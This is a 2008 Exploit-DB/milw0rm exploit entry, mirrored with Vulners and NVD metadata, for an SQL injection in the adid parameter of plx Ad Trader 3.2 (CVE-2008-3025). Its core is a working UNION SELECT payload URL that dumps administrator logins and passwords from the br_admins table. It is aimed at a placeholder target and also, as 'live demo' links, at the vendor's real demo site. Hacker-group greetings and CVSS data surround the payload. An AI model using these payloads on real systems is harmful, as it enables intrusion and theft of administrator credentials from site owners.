Search...

plx Ad Trader 3.2 adid Remote SQL Injection Vulnerability

2008-07-01T00:00:00

ID EDB-ID:5988
Type exploitdb
Reporter Hussin X
Modified 2008-07-01T00:00:00

Description

plx Ad Trader 3.2 (adid) Remote SQL Injection Vulnerability. CVE-2008-3025. Webapps exploit for php platform

                                        
                                            @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@     plx Ad Trader v3.2  SQL Injection Vulnerability
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    Author: Hussin X                                   @
@                                                       @
@    Home :  www.tryag.cc/cc                            @
@                                                       @
@    email:  darkangel_g85[at]Yahoo[DoT]com             @
@            hussin.x[at]hotmail[DoT]com                @
@                                                       @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    
@
@    HomE script : http://plxwebdev.com
@
@    DeMo        : http://plxwebdev.com/demos/plxadtrader                              
@                                                      
@                                                      
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@
@
@

ExPloiT :

www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- 



L!VE DEMO :

USER

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--

PASSWORD

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--


@
@
@
@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@
@                                                       @
@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR       @
@                                                       @
@          str0ke / FAHD  /Iraqihack / Silic0n          @
@@@@@@@@@@@@@@@@@                       @@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@

# milw0rm.com [2008-07-01]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5988", "type": "exploitdb", "bulletinFamily": "exploit", "title": "plx Ad Trader 3.2 adid Remote SQL Injection Vulnerability", "description": "plx Ad Trader 3.2 (adid) Remote SQL Injection Vulnerability. CVE-2008-3025. Webapps exploit for php platform", "published": "2008-07-01T00:00:00", "modified": "2008-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5988/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-3025"], "lastseen": "2016-01-31T23:58:22", "viewCount": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-01-31T23:58:22", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3025"]}], "modified": "2016-01-31T23:58:22", "rev": 2}, "vulnersScore": 7.5}, "sourceHref": "https://www.exploit-db.com/download/5988/", "sourceData": "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@\n@ plx Ad Trader v3.2 SQL Injection Vulnerability\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@ Author: Hussin X @\n@ @\n@ Home : www.tryag.cc/cc @\n@ @\n@ email: darkangel_g85[at]Yahoo[DoT]com @\n@ hussin.x[at]hotmail[DoT]com @\n@ @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \n@\n@ HomE script : http://plxwebdev.com\n@\n@ DeMo : http://plxwebdev.com/demos/plxadtrader \n@ \n@ \n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@\n@\n@\n@\n\nExPloiT :\n\nwww.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- \n\n\n\nL!VE DEMO :\n\nUSER\n\nhttp://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--\n\nPASSWORD\n\nhttp://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--\n\n\n@\n@\n@\n@@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@\n@ @\n@ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR @\n@ @\n@ str0ke / FAHD /Iraqihack / Silic0n @\n@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@\n@@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@\n\n# milw0rm.com [2008-07-01]\n", "osvdbidlist": ["46654"]}

{"cve": [{"lastseen": "2020-10-03T11:51:00", "description": "SQL injection vulnerability in ad.php in plx Ad Trader 3.2 allows remote attackers to execute arbitrary SQL commands via the adid parameter in a redir action.", "edition": 3, "cvss3": {}, "published": "2008-07-07T18:41:00", "title": "CVE-2008-3025", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3025"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:plx_web_studio:plx_ad_trader:3.2"], "id": "CVE-2008-3025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3025", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:plx_web_studio:plx_ad_trader:3.2:*:*:*:*:*:*:*"]}]}